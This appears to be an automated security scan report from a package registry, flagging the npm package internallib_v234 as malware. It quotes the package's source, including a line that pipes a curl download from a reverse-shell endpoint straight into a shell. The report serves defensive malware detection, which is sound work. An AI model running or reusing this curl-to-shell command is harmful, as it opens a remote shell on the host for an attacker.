registry  /  internallib_v234  /  1.0.3

internallib_v234@1.0.3

AI Security Review

scanned 5h ago · by lpm-firewall-ai

The package exposes a function that downloads a remote shell script and executes it with bash. The endpoint name and URL indicate reverse-shell behavior.

Static reason
High-risk behavior combination matched malicious policy.; source fingerprint signature matched known malicious package; routed for review
Trigger
Runtime call to exports.command() or running check.js
Impact
Remote code execution and likely reverse shell on the caller host
Mechanism
curl-to-shell via child_process.exec
Attack narrative
When the package entrypoint is imported and its command() export is called, it invokes child_process.exec with a bash command that curls https://reverse-shell.sh/10.0.74.133:443 and pipes the response directly into sh. check.js shows the exported function being called. This is concrete remote code execution with a reverse-shell endpoint, though not triggered by npm install lifecycle scripts.
Rationale
Direct source inspection confirms a reachable exported function executes a remote script through bash. This is malicious remote code execution rather than a noisy scanner-only finding.
Evidence
index.jscheck.jspackage.json
Network endpoints1
reverse-shell.sh/10.0.74.133:443

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js imports child_process.exec.
  • index.js exported command runs /bin/bash with curl piped to sh.
  • Remote script URL is https://reverse-shell.sh/10.0.74.133:443.
  • check.js invokes internallib.command(), demonstrating reachable execution.
  • package.json main points to index.js.
Evidence against
  • No npm lifecycle hook runs at install time.
  • Execution requires calling the exported command or running check.js.
Behavioral surface
Source
ChildProcessShell
Supply chain
TrivialUrlStrings
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 272 B of source, external domains: reverse-shell.sh

Source & flagged code

5 flagged · loading source
index.jsView file
1const { exec } = require('child_process'); L2: ... L4: console.log("vert16x"); L5: exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.74.133:443|sh"'); L6: return "deu bom";
Critical
Download Execute

Source downloads or fetches remote code and executes it.

index.jsView on unpkg · L1
1Trigger-reachable chain: manifest.main -> index.js L1: const { exec } = require('child_process'); L2: ... L4: console.log("vert16x"); L5: exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.74.133:443|sh"'); L6: return "deu bom";
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

index.jsView on unpkg · L1
1const { exec } = require('child_process'); L2:
High
Child Process

Package source references child process execution.

index.jsView on unpkg · L1
4console.log("vert16x"); L5: exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.74.133:443|sh"'); L6: return "deu bom";
High
Shell

Package source references shell execution.

index.jsView on unpkg · L4
matchType = malicious_source_fingerprint_signature signature = 664ce3e800c949fb signatureType = suspicious_hashes sourceLabel = Datadog matchedPackage = @joaoxxx/internallib-v325@1.0.7 matchedPath = index.js matchedIdentity = npm:[redacted]:1.0.7 similarity = 1.000 shingleOverlap = 2 summary = Datadog malicious npm corpus sample: samples/npm/malicious_intent/@joaoxxx@internallib-v325/1.0.7/2026-01-09-@joaoxxx_internallib-v325-v1.0.7.zip
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg

Findings

2 Critical3 High2 Low
CriticalDownload Executeindex.js
CriticalTrigger Reachable Dangerous Capabilityindex.js
HighChild Processindex.js
HighShellindex.js
HighKnown Malware Source Fingerprint Signatureindex.js
LowScripts Present
LowUrl Strings